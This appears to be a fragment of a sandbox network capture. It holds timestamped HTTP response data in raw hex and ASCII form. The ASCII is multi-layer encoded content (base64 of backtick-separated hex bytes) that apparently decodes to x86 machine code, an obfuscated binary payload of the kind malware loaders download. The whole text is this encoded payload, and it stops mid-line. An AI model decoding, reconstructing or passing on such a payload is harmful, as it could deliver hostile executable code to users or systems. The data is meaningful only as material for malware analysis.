                                                      2021-12-02 17:26:37 UTC1299INData Raw: 41 77 4d 53 78 67 4f 44 59 73 59 44 41 34 4c 47 41 77 51 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4f 44 59 73 59 44 41 30 4c 47 41 77 51 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 68 45 4c 47 41 31 4e 53 78 67 4f 44 41 73 59 44 55 79 4c 47 41 31 4d 43 78 67 52 54 67 73 59 44 56 44 4c 47 41 34 52 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 44 67 77 4c 47 41 31 4d 53 78 67 52 54 67 73 59 45 55 7a 4c 47 41 34 52 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 79 78 67 51 7a 41 73 59 44 41 78 4c 47 41 34 4e 69 78 67 4d 44 67 73 59 44 42 42 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 31 4e 79 78 67 4d 44 51 73 59 44 55 79 4c 47 41 31 4e 69 78 67 52 54 67 73 59 44 67 78 4c
                                                      Data Ascii: AwMSxgODYsYDA4LGAwQSxgMDAsYDAwLGA4QixgODYsYDA0LGAwQSxgMDAsYDAwLGA2QSxgMDAsYDhELGA1NSxgODAsYDUyLGA1MCxgRTgsYDVDLGA4RixgMDAsYDAwLGA4RCxgNEQsYDgwLGA1MSxgRTgsYEUzLGA4RCxgMDAsYDAwLGAwMyxgQzAsYDAxLGA4NixgMDgsYDBBLGAwMCxgMDAsYDhCLGA1NyxgMDQsYDUyLGA1NixgRTgsYDgxL
                                                      2021-12-02 17:26:37 UTC1315INData Raw: 41 31 4e 79 78 67 4e 54 59 73 59 45 55 34 4c 47 41 32 52 43 78 67 4e 7a 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 45 51 73 59 44 67 31 4c 47 42 45 51 79 78 67 52 6b 49 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 41 73 59 45 55 34 4c 47 42 47 4d 53 78 67 4f 44 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6a 67 73 59 44 45 35 4c 47 41 77 4d 69 78 67 4d 44 49 73 59 44 41 77 4c 47 41 34 52 43 78 67 4f 45 51 73 59 45 52 44 4c 47 42 47 51 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 31 4d 53 78 67 4f 45 51 73 59 44 55 31 4c 47 42 47 51 79 78 67 4e 54 49 73 59 44 55 32 4c 47 41 34 51 69 78 67 52 6a 67 73 59 45 55 34 4c 47 42 46 4f 53 78 67 4f 54 41 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 79 51 79 78 67 4f 44 55 73 59 45 4d 77 4c
                                                      Data Ascii: A1NyxgNTYsYEU4LGA2RCxgNzEsYEZGLGBGRixgOEQsYDg1LGBEQyxgRkIsYEZGLGBGRixgNTAsYEU4LGBGMSxgODEsYDAwLGAwMCxgNjgsYDE5LGAwMixgMDIsYDAwLGA4RCxgOEQsYERDLGBGQixgRkYsYEZGLGA1MSxgOEQsYDU1LGBGQyxgNTIsYDU2LGA4QixgRjgsYEU4LGBFOSxgOTAsYEZGLGBGRixgODMsYEM0LGAyQyxgODUsYEMwL
                                                      2021-12-02 17:26:37 UTC1331INData Raw: 42 47 52 53 78 67 4d 44 6b 73 59 44 63 31 4c 47 41 77 4e 79 78 67 51 6b 49 73 59 44 67 35 4c 47 41 77 4d 53 78 67 4d 54 49 73 59 44 41 77 4c 47 42 46 51 69 78 67 4e 54 51 73 59 44 67 7a 4c 47 42 47 52 53 78 67 4d 45 59 73 59 44 63 30 4c 47 41 30 51 53 78 67 4f 44 4d 73 59 45 5a 46 4c 47 41 77 51 69 78 67 4e 7a 51 73 59 44 51 31 4c 47 41 34 4d 79 78 67 52 6b 55 73 59 44 45 32 4c 47 41 33 4e 53 78 67 4d 44 55 73 59 44 67 35 4c 47 41 31 4e 53 78 67 52 6a 51 73 59 45 56 43 4c 47 41 30 4d 43 78 67 4f 44 4d 73 59 45 5a 46 4c 47 41 77 4f 43 78 67 4e 7a 55 73 59 44 41 31 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 59 30 4c 47 42 46 51 69 78 67 4d 7a 45 73 59 44 67 7a 4c 47 42 47 52 53 78 67 4d 54 6b 73 59 44 63 31 4c 47 41 77 4e 53 78 67 4f 44 6b 73 59 44 64 45 4c
                                                      Data Ascii: BGRSxgMDksYDc1LGAwNyxgQkIsYDg5LGAwMSxgMTIsYDAwLGBFQixgNTQsYDgzLGBGRSxgMEYsYDc0LGA0QSxgODMsYEZFLGAwQixgNzQsYDQ1LGA4MyxgRkUsYDE2LGA3NSxgMDUsYDg5LGA1NSxgRjQsYEVCLGA0MCxgODMsYEZFLGAwOCxgNzUsYDA1LGA4OSxgNDUsYEY0LGBFQixgMzEsYDgzLGBGRSxgMTksYDc1LGAwNSxgODksYDdEL
                                                      2021-12-02 17:26:37 UTC1347INData Raw: 42 47 52 69 78 67 4d 30 4d 73 59 44 4a 44 4c 47 41 33 4e 43 78 67 51 6a 49 73 59 44 4e 44 4c 47 41 79 52 43 78 67 4d 45 59 73 59 44 67 30 4c 47 41 77 4d 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 45 51 73 59 44 55 77 4c 47 42 45 4d 43 78 67 4f 44 41 73 59 45 5a 42 4c 47 41 77 4d 79 78 67 4d 45 59 73 59 44 67 32 4c 47 41 79 51 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4d 30 4d 73 59 44 4d 30 4c 47 41 77 52 69 78 67 4f 44 51 73 59 44 51 32 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 7a 51 79 78 67 4d 7a 55 73 59 44 42 47 4c 47 41 34 4e 43 78 67 4e 6a 41 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 45 4c 47 41 30 4f 43 78 67 51 7a 67 73 59 44 67 77 4c 47 42 47 4f 53 78 67 4d 44 4d 73 59 44 42 47 4c
                                                      Data Ascii: BGRixgM0MsYDJDLGA3NCxgQjIsYDNDLGAyRCxgMEYsYDg0LGAwMixgRkYsYEZGLGBGRixgOEQsYDUwLGBEMCxgODAsYEZBLGAwMyxgMEYsYDg2LGAyQyxgRkYsYEZGLGBGRixgM0MsYDM0LGAwRixgODQsYDQ2LGBGRixgRkYsYEZGLGAzQyxgMzUsYDBGLGA4NCxgNjAsYEZGLGBGRixgRkYsYDhELGA0OCxgQzgsYDgwLGBGOSxgMDMsYDBGL
                                                      2021-12-02 17:26:37 UTC1363INData Raw: 41 32 51 53 78 67 4d 44 41 73 59 44 55 79 4c 47 42 47 52 69 78 67 52 44 41 73 59 44 4d 7a 4c 47 42 44 4f 53 78 67 4e 6a 67 73 59 45 5a 46 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 53 78 67 4f 45 51 73 59 44 6b 31 4c 47 42 42 51 53 78 67 52 6b 4d 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 49 73 59 44 59 32 4c 47 41 34 4f 53 78 67 4f 45 51 73 59 45 45 34 4c 47 42 47 51 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 4e 7a 51 73 59 44 56 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 4d 7a 4c 47 42 44 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 51 79 78 67 51 7a 63 73 59 44 51 31 4c 47 42 44 4f 43 78 67 4e 6a 6b 73 59 44 41 77 4c 47 41 32 52 43 78 67 4d 44 41 73 59 45 4d 33 4c 47 41 30 4e 53 78 67 51 30 4d 73 59 44 4a 46 4c
                                                      Data Ascii: A2QSxgMDAsYDUyLGBGRixgRDAsYDMzLGBDOSxgNjgsYEZFLGAwMSxgMDAsYDAwLGA1MSxgOEQsYDk1LGBBQSxgRkMsYEZGLGBGRixgNTIsYDY2LGA4OSxgOEQsYEE4LGBGQyxgRkYsYEZGLGBFOCxgNzQsYDVCLGAwMCxgMDAsYDMzLGBDMCxgODMsYEM0LGAwQyxgQzcsYDQ1LGBDOCxgNjksYDAwLGA2RCxgMDAsYEM3LGA0NSxgQ0MsYDJFL
                                                      2021-12-02 17:26:37 UTC1379INData Raw: 41 34 4e 53 78 67 51 7a 41 73 59 44 63 31 4c 47 42 43 4e 79 78 67 4e 54 59 73 59 44 68 45 4c 47 41 34 52 69 78 67 4e 6a 6b 73 59 44 45 79 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 55 78 4c 47 41 31 4d 79 78 67 52 54 67 73 59 44 59 79 4c 47 41 31 4e 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 42 44 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 63 31 4c 47 42 42 4d 69 78 67 4e 54 59 73 59 44 68 45 4c 47 41 35 4e 79 78 67 4e 7a 45 73 59 44 45 79 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 55 79 4c 47 41 31 4d 79 78 67 52 54 67 73 59 44 52 45 4c 47 41 31 4e 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 42 44 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 63 31 4c 47 41 34 52 43 78 67 4e 54 59 73 59 44 67 78 4c
                                                      Data Ascii: A4NSxgQzAsYDc1LGBCNyxgNTYsYDhELGA4RixgNjksYDEyLGAwMSxgMDAsYDUxLGA1MyxgRTgsYDYyLGA1NyxgMDAsYDAwLGA4MyxgQzQsYDBDLGA4NSxgQzAsYDc1LGBBMixgNTYsYDhELGA5NyxgNzEsYDEyLGAwMSxgMDAsYDUyLGA1MyxgRTgsYDRELGA1NyxgMDAsYDAwLGA4MyxgQzQsYDBDLGA4NSxgQzAsYDc1LGA4RCxgNTYsYDgxL
                                                      2021-12-02 17:26:37 UTC1395INData Raw: 41 7a 4e 43 78 67 4d 6a 67 73 59 45 52 46 4c 47 42 44 51 53 78 67 51 30 49 73 59 44 4d 7a 4c 47 41 32 4d 69 78 67 4d 44 45 73 59 44 45 30 4c 47 42 46 4d 43 78 67 4d 7a 45 73 59 45 55 32 4c 47 42 46 4d 53 78 67 4d 54 63 73 59 44 6b 78 4c 47 41 34 4e 43 78 67 4d 30 51 73 59 45 52 44 4c 47 42 45 52 43 78 67 4e 7a 51 73 59 45 52 46 4c 47 42 45 4f 53 78 67 51 55 55 73 59 45 59 79 4c 47 41 34 52 53 78 67 4f 45 45 73 59 44 59 35 4c 47 41 35 51 69 78 67 4f 54 59 73 59 44 56 43 4c 47 41 78 52 69 78 67 4d 44 41 73 59 44 67 35 4c 47 41 78 4f 53 78 67 4e 6a 51 73 59 44 4d 79 4c 47 41 31 52 53 78 67 4d 54 51 73 59 44 49 31 4c 47 41 78 4d 69 78 67 4e 44 63 73 59 45 52 43 4c 47 41 77 52 69 78 67 4d 55 4d 73 59 45 52 42 4c 47 42 47 52 53 78 67 4f 44 45 73 59 45 4d 34 4c
                                                      Data Ascii: AzNCxgMjgsYERFLGBDQSxgQ0IsYDMzLGA2MixgMDEsYDE0LGBFMCxgMzEsYEU2LGBFMSxgMTcsYDkxLGA4NCxgM0QsYERDLGBERCxgNzQsYERFLGBEOSxgQUUsYEYyLGA4RSxgOEEsYDY5LGA5QixgOTYsYDVCLGAxRixgMDAsYDg5LGAxOSxgNjQsYDMyLGA1RSxgMTQsYDI1LGAxMixgNDcsYERCLGAwRixgMUMsYERBLGBGRSxgODEsYEM4L
                                                      2021-12-02 17:26:37 UTC1411INData Raw: 41 7a 4e 53 78 67 4f 54 51 73 59 45 4d 31 4c 47 41 7a 4e 53 78 67 4e 54 55 73 59 44 68 43 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 77 4f 43 78 67 4f 45 49 73 59 44 51 34 4c 47 41 79 4d 43 78 67 4e 54 59 73 59 44 68 43 4c 47 41 33 4d 43 78 67 4d 6a 51 73 59 44 55 33 4c 47 41 34 51 69 78 67 4e 7a 67 73 59 44 41 30 4c 47 41 34 4d 79 78 67 4e 30 59 73 59 44 51 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 45 51 78 4c 47 41 33 4e 43 78 67 4d 44 55 73 59 44 68 43 4c 47 41 31 4d 43 78 67 4d 55 4d 73 59 44 68 43 4c 47 42 47 4d 53 78 67 4f 44 55 73 59 45 51 79 4c 47 41 33 4e 43 78 67 4d 54 55 73 59 44 68 45 4c 47 41 30 4e 69 78 67 52 6a 51 73 59 44 4e 45 4c 47 42 47 4d 79 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 7a 63 73 59 44 42 43 4c
                                                      Data Ascii: AzNSxgOTQsYEM1LGAzNSxgNTUsYDhCLGBFQyxgOEIsYDQ1LGAwOCxgOEIsYDQ4LGAyMCxgNTYsYDhCLGA3MCxgMjQsYDU3LGA4QixgNzgsYDA0LGA4MyxgN0YsYDQwLGAwMCxgOEIsYEQxLGA3NCxgMDUsYDhCLGA1MCxgMUMsYDhCLGBGMSxgODUsYEQyLGA3NCxgMTUsYDhELGA0NixgRjQsYDNELGBGMyxgMDEsYDAwLGAwMCxgNzcsYDBCL
                                                      2021-12-02 17:26:37 UTC1427INData Raw: 41 34 4e 79 78 67 4e 6a 51 73 59 44 45 78 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 78 4e 43 78 67 4d 45 59 73 59 44 6b 30 4c 47 42 44 4d 69 78 67 4f 45 51 73 59 44 67 32 4c 47 41 31 4d 43 78 67 4d 30 4d 73 59 44 52 47 4c 47 41 77 4d 43 78 67 4f 44 6b 73 59 44 6b 32 4c 47 41 30 4d 43 78 67 4d 30 4d 73 59 44 52 47 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 68 47 4c 47 42 42 4d 43 78 67 4d 54 51 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 55 30 4c 47 41 78 4f 53 78 67 4e 7a 49 73 59 44 55 79 4c 47 41 31 4d 43 78 67 52 54 67 73 59 45 56 45 4c 47 41 79 51 53 78 67 4d 44 41 73 59 44 41 77 4c 47 42 44 4e 79 78 67 4f 44 59 73 59 44 51 30 4c 47 41 7a 51 79 78 67 4e 45 59 73 59 44 41 77 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c
                                                      Data Ascii: A4NyxgNjQsYDExLGAwMCxgMDAsYDZBLGAxNCxgMEYsYDk0LGBDMixgOEQsYDg2LGA1MCxgM0MsYDRGLGAwMCxgODksYDk2LGA0MCxgM0MsYDRGLGAwMCxgOEIsYDhGLGBBMCxgMTQsYDAwLGAwMCxgOEQsYDU0LGAxOSxgNzIsYDUyLGA1MCxgRTgsYEVELGAyQSxgMDAsYDAwLGBDNyxgODYsYDQ0LGAzQyxgNEYsYDAwLGAwMSxgMDAsYDAwL
                                                      2021-12-02 17:26:37 UTC1443INData Raw: 41 32 51 53 78 67 4d 44 41 73 59 44 55 78 4c 47 41 34 52 43 78 67 51 6a 41 73 59 45 59 30 4c 47 41 77 51 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4e 69 78 67 4e 54 41 73 59 45 55 34 4c 47 41 34 4e 43 78 67 4d 54 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 55 31 4c 47 41 78 4f 43 78 67 4f 45 49 73 59 44 51 31 4c 47 41 78 4e 43 78 67 4f 45 49 73 59 44 52 45 4c 47 41 78 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 78 4e 43 78 67 4e 54 49 73 59 44 68 43 4c 47 41 31 4e 53 78 67 4d 45 4d 73 59 44 55 77 4c 47 41 34 51 69 78 67 4d 44 59 73 59 44 55 78 4c 47 41 31 4d 69 78 67 52 6b 59 73 59 45 51 77 4c 47 41 31 52 53 78 67 4e 55 51 73 59 45 4d 7a 4c 47 41 32 52 43 78 67 4e 44 49 73 59 44 41 34 4c 47 41 35 4e 53 78 67 4d 30 55 73 59 44 67 79 4c
                                                      Data Ascii: A2QSxgMDAsYDUxLGA4RCxgQjAsYEY0LGAwQixgMDAsYDAwLGA1NixgNTAsYEU4LGA4NCxgMTAsYDAwLGAwMCxgOEIsYDU1LGAxOCxgOEIsYDQ1LGAxNCxgOEIsYDRELGAxMCxgODMsYEM0LGAxNCxgNTIsYDhCLGA1NSxgMEMsYDUwLGA4QixgMDYsYDUxLGA1MixgRkYsYEQwLGA1RSxgNUQsYEMzLGA2RCxgNDIsYDA4LGA5NSxgM0UsYDgyL
                                                      2021-12-02 17:26:37 UTC1459INData Raw: 41 78 4e 43 78 67 4e 54 41 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 54 41 73 59 44 55 78 4c 47 41 34 51 69 78 67 4e 45 51 73 59 44 42 44 4c 47 41 31 4d 69 78 67 4e 54 41 73 59 44 55 78 4c 47 42 47 52 69 78 67 52 44 59 73 59 44 56 46 4c 47 41 34 51 69 78 67 52 54 55 73 59 44 56 45 4c 47 42 44 4d 79 78 67 4d 7a 4d 73 59 45 4d 77 4c 47 41 31 52 53 78 67 4f 45 49 73 59 45 55 31 4c 47 41 31 52 43 78 67 51 7a 4d 73 59 45 56 45 4c 47 41 79 51 69 78 67 4e 30 55 73 59 44 55 77 4c 47 42 42 52 43 78 67 4f 44 63 73 59 45 51 31 4c 47 41 30 51 53 78 67 4d 44 51 73 59 45 59 34 4c 47 41 31 4e 53 78 67 4f 45 49 73 59 45 56 44 4c 47 41 34 4d 79 78 67 52 55 4d 73 59 44 45 30 4c 47 41 34 51 69 78 67 4e 44 55 73 59 44 41 34 4c 47 41 34 51 69 78 67 4e 54 41 73 59 44 45 30 4c
                                                      Data Ascii: AxNCxgNTAsYDhCLGA0NSxgMTAsYDUxLGA4QixgNEQsYDBDLGA1MixgNTAsYDUxLGBGRixgRDYsYDVFLGA4QixgRTUsYDVELGBDMyxgMzMsYEMwLGA1RSxgOEIsYEU1LGA1RCxgQzMsYEVELGAyQixgN0UsYDUwLGBBRCxgODcsYEQ1LGA0QSxgMDQsYEY4LGA1NSxgOEIsYEVDLGA4MyxgRUMsYDE0LGA4QixgNDUsYDA4LGA4QixgNTAsYDE0L
                                                      2021-12-02 17:26:37 UTC1475INData Raw: 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 51 32 4c 47 41 7a 4d 43 78 67 4e 54 41 73 59 44 68 45 4c 47 41 34 52 43 78 67 52 6a 51 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 55 78 4c 47 42 46 4f 43 78 67 51 54 41 73 59 44 42 45 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 45 4c 47 41 35 4e 53 78 67 52 6a 51 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 55 79 4c 47 41 31 4e 79 78 67 52 54 67 73 59 44 41 7a 4c 47 41 35 4e 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 45 77 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 63 31 4c 47 41 77 52 69 78 67 4f 45 49 73 59 44 4d 32 4c 47 41 7a 4f 53 78 67 4e 44 59 73 59 44 45 34 4c 47 41 33 4e 53 78 67 52 44 55 73 59 44 56 47 4c
                                                      Data Ascii: AwMCxgMDAsYDAwLGAwMCxgOEIsYDQ2LGAzMCxgNTAsYDhELGA4RCxgRjQsYEZFLGBGRixgRkYsYDUxLGBFOCxgQTAsYDBELGAwMCxgMDAsYDhELGA5NSxgRjQsYEZFLGBGRixgRkYsYDUyLGA1NyxgRTgsYDAzLGA5NyxgRkYsYEZGLGA4MyxgQzQsYDEwLGA4NSxgQzAsYDc1LGAwRixgOEIsYDM2LGAzOSxgNDYsYDE4LGA3NSxgRDUsYDVGL
                                                      2021-12-02 17:26:37 UTC1491INData Raw: 41 34 4f 43 78 67 4e 44 51 73 59 44 6c 46 4c 47 41 31 4e 69 78 67 4e 54 55 73 59 44 68 43 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 77 4f 43 78 67 4d 45 59 73 59 45 49 33 4c 47 41 77 4f 43 78 67 4f 45 49 73 59 44 55 31 4c 47 41 77 51 79 78 67 4e 6a 59 73 59 44 67 31 4c 47 42 44 4f 53 78 67 4e 7a 51 73 59 44 45 7a 4c 47 41 77 52 69 78 67 51 6a 63 73 59 45 4d 35 4c 47 41 7a 51 69 78 67 52 44 45 73 59 44 63 30 4c 47 41 78 51 69 78 67 4d 45 59 73 59 45 49 33 4c 47 41 30 4f 43 78 67 4d 44 49 73 59 44 67 7a 4c 47 42 44 4d 43 78 67 4d 44 49 73 59 44 59 32 4c 47 41 34 4e 53 78 67 51 7a 6b 73 59 44 63 31 4c 47 42 46 52 43 78 67 4d 45 59 73 59 45 49 33 4c 47 41 77 4f 43 78 67 4e 54 4d 73 59 44 4d 7a 4c 47 42 45 51 69 78 67 4d 30 49 73 59 45 51 78 4c
                                                      Data Ascii: A4OCxgNDQsYDlFLGA1NixgNTUsYDhCLGBFQyxgOEIsYDQ1LGAwOCxgMEYsYEI3LGAwOCxgOEIsYDU1LGAwQyxgNjYsYDg1LGBDOSxgNzQsYDEzLGAwRixgQjcsYEM5LGAzQixgRDEsYDc0LGAxQixgMEYsYEI3LGA0OCxgMDIsYDgzLGBDMCxgMDIsYDY2LGA4NSxgQzksYDc1LGBFRCxgMEYsYEI3LGAwOCxgNTMsYDMzLGBEQixgM0IsYEQxL
                                                      2021-12-02 17:26:37 UTC1507INData Raw: 42 47 52 69 78 67 4e 44 45 73 59 44 4e 43 4c 47 42 44 52 53 78 67 4e 7a 49 73 59 45 55 7a 4c 47 41 34 51 53 78 67 4f 54 55 73 59 45 5a 44 4c 47 42 47 52 53 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 51 69 78 67 4e 7a 55 73 59 44 41 34 4c 47 41 34 4e 43 78 67 52 44 49 73 59 44 63 30 4c 47 41 78 51 53 78 67 4f 45 51 73 59 44 67 31 4c 47 42 47 51 79 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 45 49 73 59 45 4e 46 4c 47 41 31 4e 79 78 67 4e 6a 59 73 59 44 42 47 4c 47 42 43 52 53 78 67 4d 7a 67 73 59 44 59 32 4c 47 41 34 4f 53 78 67 4d 7a 6b 73 59 44 51 77 4c 47 41 34 4d 79 78 67 51 7a 45 73 59 44 41 79 4c 47 41 34 4d 43 78 67 4d 7a 67 73 59 44 41 77 4c 47 41 33 4e 53 78 67 52 6a 41 73 59 44 56 47 4c 47 41 7a 4d 79 78 67 51 7a 41 73 59 44 67 30 4c
                                                      Data Ascii: BGRixgNDEsYDNCLGBDRSxgNzIsYEUzLGA4QSxgOTUsYEZDLGBGRSxgRkYsYEZGLGA4QixgNzUsYDA4LGA4NCxgRDIsYDc0LGAxQSxgOEQsYDg1LGBGQyxgRkUsYEZGLGBGRixgOEIsYENFLGA1NyxgNjYsYDBGLGBCRSxgMzgsYDY2LGA4OSxgMzksYDQwLGA4MyxgQzEsYDAyLGA4MCxgMzgsYDAwLGA3NSxgRjAsYDVGLGAzMyxgQzAsYDg0L
                                                      2021-12-02 17:26:37 UTC1511INData Raw: 41 30 4e 53 78 67 52 6b 4d 73 59 44 63 30 4c 47 41 77 4e 69 78 67 4f 44 4d 73 59 45 4d 77 4c 47 41 77 4f 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 51 79 78 67 4e 54 59 73 59 44 68 43 4c 47 41 33 4e 53 78 67 4d 54 41 73 59 44 55 33 4c 47 41 7a 4d 79 78 67 52 6b 59 73 59 44 4d 35 4c 47 41 33 52 53 78 67 4d 45 4d 73 59 44 42 47 4c 47 41 34 4e 69 78 67 52 6b 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 55 7a 4c 47 41 34 52 43 78 67 4e 55 55 73 59 44 45 30 4c 47 41 34 52 43 78 67 4f 55 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 44 4d 73 59 44 41 30 4c 47 41 34 51 69 78 67 4d 45 49 73 59 44 68 43 4c 47 41 31 4e 53 78 67 52 6b 4d 73 59 44 55 77 4c 47 41 77 4d 79 78 67 51 30 55 73 59 44 55 78 4c
                                                      Data Ascii: A0NSxgRkMsYDc0LGAwNixgODMsYEMwLGAwOCxgODksYDQ1LGBGQyxgNTYsYDhCLGA3NSxgMTAsYDU3LGAzMyxgRkYsYDM5LGA3RSxgMEMsYDBGLGA4NixgRkYsYDAwLGAwMCxgMDAsYDUzLGA4RCxgNUUsYDE0LGA4RCxgOUIsYDAwLGAwMCxgMDAsYDAwLGA4QixgNDMsYDA0LGA4QixgMEIsYDhCLGA1NSxgRkMsYDUwLGAwMyxgQ0UsYDUxL
                                                      2021-12-02 17:26:37 UTC1527INData Raw: 42 44 4d 79 78 67 51 54 59 73 59 44 46 46 4c 47 41 30 4e 43 78 67 4f 44 45 73 59 45 56 43 4c 47 42 43 51 69 78 67 51 54 67 73 59 44 41 32 4c 47 42 43 4d 53 78 67 51 6a 63 73 59 44 4a 44 4c 47 42 44 4d 53 78 67 4d 6a 55 73 59 44 6c 45 4c 47 41 34 51 69 78 67 52 44 45 73 59 45 56 44 4c 47 41 78 4e 53 78 67 51 7a 45 73 59 44 4e 45 4c 47 41 35 52 53 78 67 52 45 51 73 59 45 45 34 4c 47 41 34 4e 69 78 67 4e 7a 51 73 59 44 51 7a 4c 47 41 77 4d 69 78 67 4d 6a 55 73 59 44 41 34 4c 47 42 45 4e 43 78 67 52 45 59 73 59 44 64 43 4c 47 41 34 4d 43 78 67 52 45 4d 73 59 44 67 30 4c 47 41 79 4d 43 78 67 4d 7a 55 73 59 45 55 79 4c 47 41 34 4d 43 78 67 52 54 51 73 59 45 5a 44 4c 47 41 78 4d 79 78 67 4d 6b 51 73 59 44 42 47 4c 47 41 30 4d 79 78 67 4d 45 49 73 59 44 45 77 4c
                                                      Data Ascii: BDMyxgQTYsYDFFLGA0NCxgODEsYEVCLGBCQixgQTgsYDA2LGBCMSxgQjcsYDJDLGBDMSxgMjUsYDlELGA4QixgRDEsYEVDLGAxNSxgQzEsYDNELGA5RSxgREQsYEE4LGA4NixgNzQsYDQzLGAwMixgMjUsYDA4LGBENCxgREYsYDdCLGA4MCxgREMsYDg0LGAyMCxgMzUsYEUyLGA4MCxgRTQsYEZDLGAxMyxgMkQsYDBGLGA0MyxgMEIsYDEwL
                                                      2021-12-02 17:26:37 UTC1543INData Raw: 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 67 73 59 45 4d 7a 4c 47 41 31 4e 53 78 67 4f 45 49 73 59 45 56 44 4c 47 41 33 4d 69 78 67 52 6b 55 73 59 44 67 33 4c 47 41 7a 4e 53 78 67 4e 7a 49 73 59 45 45 32 4c 47 42 46 52 53 78 67 4e 54 67 73 59 45 4d 77 4c 47 41 77 4e 53 78 67 4f 44 67 73 59 44 49 77 4c 47 41 34 52 53 78 67 4f 54 67 73 59 45 46 42 4c 47 42 42 51 79 78 67 4e 45 45 73 59 44 45 35 4c 47 41 77 4e 53 78 67 4f 45 55 73 59 44 55 34 4c 47 41 32 51 69 78 67 4e 45 49 73 59 45 4d 77 4c 47 41 77 52 43 78 67 4d 54 49 73 59 44 64 44 4c 47 41 79 52 43 78 67 51 6b 49 73 59 45 46 43 4c 47 42 44 4d 69 78 67 52 44 6b 73 59 44 45 33 4c 47 42 44 4d 79 78 67 52 54 67 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c
                                                      Data Ascii: AwMCxgMDAsYDAwLGAwMCxgNTgsYEMzLGA1NSxgOEIsYEVDLGA3MixgRkUsYDg3LGAzNSxgNzIsYEE2LGBFRSxgNTgsYEMwLGAwNSxgODgsYDIwLGA4RSxgOTgsYEFBLGBBQyxgNEEsYDE5LGAwNSxgOEUsYDU4LGA2QixgNEIsYEMwLGAwRCxgMTIsYDdDLGAyRCxgQkIsYEFCLGBDMixgRDksYDE3LGBDMyxgRTgsYDAwLGAwMCxgMDAsYDAwL
                                                      2021-12-02 17:26:37 UTC1559INData Raw: 41 79 4f 43 78 67 4d 55 45 73 59 45 51 79 4c 47 41 77 51 69 78 67 4e 6b 49 73 59 44 4e 44 4c 47 41 35 51 79 78 67 52 44 55 73 59 45 45 7a 4c 47 41 31 51 53 78 67 51 6b 55 73 59 45 59 35 4c 47 41 34 4f 53 78 67 52 6b 59 73 59 44 56 46 4c 47 42 42 4e 69 78 67 4e 44 4d 73 59 45 45 7a 4c 47 42 46 4f 53 78 67 4d 7a 49 73 59 44 4a 46 4c 47 42 46 51 53 78 67 4e 7a 67 73 59 45 51 78 4c 47 42 45 4e 69 78 67 4d 54 41 73 59 44 6c 46 4c 47 42 44 4d 79 78 67 52 54 55 73 59 44 59 31 4c 47 41 33 4f 53 78 67 4e 7a 63 73 59 44 5a 45 4c 47 41 79 4f 53 78 67 52 55 55 73 59 44 49 79 4c 47 41 7a 4d 69 78 67 4e 55 45 73 59 45 45 32 4c 47 42 43 51 79 78 67 4d 44 67 73 59 45 51 32 4c 47 41 30 51 79 78 67 4e 55 59 73 59 44 5a 45 4c 47 42 43 4e 79 78 67 